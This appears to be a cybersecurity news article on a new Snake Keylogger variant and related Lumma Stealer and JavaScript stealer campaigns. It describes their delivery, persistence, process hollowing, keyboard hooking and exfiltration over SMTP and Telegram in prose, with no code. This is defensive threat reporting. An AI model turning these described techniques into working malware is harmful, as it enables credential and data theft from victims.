A recently discovered variant of the Snake Keylogger malware is actively targeting Windows users, primarily in China, Turkey, Indonesia, Taiwan, and Spain.
According to Fortinet FortiGuard Labs, the new version of the malware has resulted in over 280 million blocked infection attempts globally since the beginning of the year.
The malware is typically spread through phishing emails with malicious attachments or links and is designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox by tracking keystrokes, capturing credentials, and monitoring the clipboard, as explained by security researcher Kevin Su in a report.
Notably, the malware exfiltrates stolen information to an attacker-controlled server using the Simple Mail Transfer Protocol (SMTP) and Telegram bots, enabling threat actors to access stolen credentials and other sensitive data.
What’s significant about the latest attacks is the use of the AutoIt scripting language to deliver and execute the main payload, effectively allowing the malware to bypass traditional detection mechanisms.
“The use of AutoIt complicates static analysis by embedding the payload within the compiled script and enables dynamic behavior that mimics benign automation tools,” Su noted.
Upon launch, Snake Keylogger drops a copy of itself to a file named “ageless.exe” in the “%Local_AppData%supergroup” folder and another file called “ageless.vbs” in the Windows Startup folder, ensuring the malware launches automatically every time the system reboots.
This persistence mechanism allows Snake Keylogger to maintain access to the compromised system and resume its malicious activities even if the associated process is terminated.
The attack chain concludes with the injection of the main payload into a legitimate .NET process, such as “regsvcs.exe,” using process hollowing, permitting the malware to remain hidden within a trusted process and evade detection.
Additionally, Snake Keylogger logs keystrokes and utilizes websites like checkip.dyndns[.]org to obtain the victim’s IP address and geolocation.
“To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL (flag 13), a low-level keyboard hook that monitors keystrokes,” Su explained. “This technique allows the malware to log sensitive input, such as banking credentials.”
Meanwhile, CloudSEK has detailed a campaign exploiting compromised infrastructure associated with educational institutions to distribute malicious LNK files disguised as PDF documents, ultimately deploying the Lumma Stealer malware.
The campaign, targeting industries like finance, healthcare, technology, and media, involves a multi-stage attack sequence resulting in the theft of passwords, browser data, and cryptocurrency wallets.
“The campaign’s primary infection vector involves using malicious LNK (shortcut) files crafted to appear as legitimate PDF documents,” security researcher Mayank Sahariya explained, adding that the files are hosted on a WebDAV server that unsuspecting visitors are redirected to after visiting compromised sites.
The LNK file executes a PowerShell command to connect to a remote server and retrieve the next-stage malware, an obfuscated JavaScript code that harbors another PowerShell that downloads Lumma Stealer from the same server and executes it.
Stealer malware has also been distributed via obfuscated JavaScript files to harvest a wide range of sensitive data from compromised Windows systems and exfiltrate it to a Telegram bot operated by the attacker.
“The attack begins with an obfuscated JavaScript file, which fetches encoded strings from an open-source service to execute a PowerShell script,” Cyfirma explained.
“This script then downloads a JPG image and a text file from an IP address and a URL shortener, both of which contain malicious MZ DOS executables embedded using steganographic techniques. Once executed, these payloads deploy stealer malware.”
